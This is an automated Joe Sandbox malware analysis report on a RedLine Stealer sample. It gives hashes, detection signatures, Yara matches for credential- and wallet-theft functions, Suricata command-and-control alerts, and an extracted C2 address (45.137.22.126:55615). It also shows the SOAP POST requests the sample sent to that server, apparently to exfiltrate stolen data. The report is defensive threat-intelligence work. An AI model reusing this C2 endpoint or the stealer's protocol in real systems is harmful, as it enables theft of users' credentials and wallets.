Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9dOKGgFNL2.exe

Overview

General Information

Sample name:9dOKGgFNL2.exe
renamed because original name is a hash value
Original sample name:020ec1df3b8b9d28da16edaf0d50a262.exe
Analysis ID:1557008
MD5:020ec1df3b8b9d28da16edaf0d50a262
SHA1:b9b841c39445febc098f7edbda4112194615fc10
SHA256:6eaf9b6af911a7995d490906ff5d42a36a47e4b1d4510f6fc33c7cdab2c80aae
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 9dOKGgFNL2.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\9dOKGgFNL2.exe" MD5: 020EC1DF3B8B9D28DA16EDAF0D50A262)
    • 9dOKGgFNL2.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\9dOKGgFNL2.exe" MD5: 020EC1DF3B8B9D28DA16EDAF0D50A262)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["45.137.22.126:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              2.2.9dOKGgFNL2.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.9dOKGgFNL2.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  2.2.9dOKGgFNL2.exe.400000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  2.2.9dOKGgFNL2.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165ea:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165cb:$v2_6: GetUpdates
                  0.2.9dOKGgFNL2.exe.458a6f0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T03:07:08.476379+010020450001Malware Command and Control Activity Detected45.137.22.12655615192.168.2.449733TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T03:07:11.420400+010020460561A Network Trojan was detected45.137.22.12655615192.168.2.449733TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T03:07:11.420400+010020450011Malware Command and Control Activity Detected45.137.22.12655615192.168.2.449733TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T03:07:03.465942+010028496621Malware Command and Control Activity Detected192.168.2.44973345.137.22.12655615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T03:07:08.786615+010028493511Malware Command and Control Activity Detected192.168.2.44973345.137.22.12655615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T03:07:13.993295+010028482001Malware Command and Control Activity Detected192.168.2.44973845.137.22.12655615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-17T03:07:11.473182+010028493521Malware Command and Control Activity Detected192.168.2.44973745.137.22.12655615TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 2.2.9dOKGgFNL2.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.137.22.126:55615"], "Bot Id": "cheat"}
                    Source: 9dOKGgFNL2.exeReversingLabs: Detection: 66%
                    Source: 9dOKGgFNL2.exeVirustotal: Detection: 62%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: 9dOKGgFNL2.exeJoe Sandbox ML: detected
                    Source: 9dOKGgFNL2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9dOKGgFNL2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: nmYV.pdb source: 9dOKGgFNL2.exe
                    Source: Binary string: nmYV.pdbSHA256 source: 9dOKGgFNL2.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49733 -> 45.137.22.126:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.126:55615 -> 192.168.2.4:49733
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49733 -> 45.137.22.126:55615
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49737 -> 45.137.22.126:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.126:55615 -> 192.168.2.4:49733
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.137.22.126:55615 -> 192.168.2.4:49733
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49738 -> 45.137.22.126:55615
                    Source: Malware configuration extractorURLs: 45.137.22.126:55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49738
                    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 45.137.22.126:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.126:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.126:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.126:55615Content-Length: 928651Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.126:55615Content-Length: 928643Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.126
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.126:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.126:5
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.126:55615
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.126:55615/
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.126:55615t-fq
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742706998.0000000006474000.00000004.00000020.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: 9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: 9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drString found in binary or memory: https://www.ecosia.org/newtab/
